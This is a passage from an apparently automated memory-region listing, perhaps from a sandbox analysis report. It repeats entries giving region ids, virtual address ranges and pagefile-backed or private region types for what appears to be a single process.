pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13417 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13418 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13419 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13440 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13441 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13442 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13447 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13448 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13449 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13450 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13451 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13452 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13453 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13454 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13455 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13456 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13457 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13458 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13459 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13460 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13461 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13462 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13463 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13464 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13465 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13466 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13467 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13468 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13482 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13483 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13484 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13485 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13486 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13487 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13488 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13489 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13490 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13491 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13492 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13625 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13626 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13627 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13628 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13629 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13630 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13631 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13632 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13633 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13634 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13635 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13636 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13637 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13638 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13639 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13640 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13641 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13642 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13643 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13644 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13645 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13646 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13647 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13648 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13649 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13650 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13651 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13652 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13653 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13654 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13655 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13656 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13657 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13658 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13659 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13660 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13661 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13662 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13663 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13664 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13665 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13666 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13667 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13668 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13669 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13670 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13671 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13673 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13704 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13705 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13706 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13707 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13708 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13709 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13710 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13711 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13712 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13713 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13714 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13715 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13716 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13717 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13718 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13719 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13720 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13721 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13722 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13723 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13724 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13725 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13726 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13727 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13728 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13729 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13730 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13731 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13732 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13733 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13734 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13735 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13736 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13737 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13738 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13749 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13750 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13751 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13752 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13753 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13754 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13755 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13756 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13757 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13758 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13759 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13760 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13761 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13762 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13763 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13764 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13765 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13766 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13767 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13768 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13769 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = 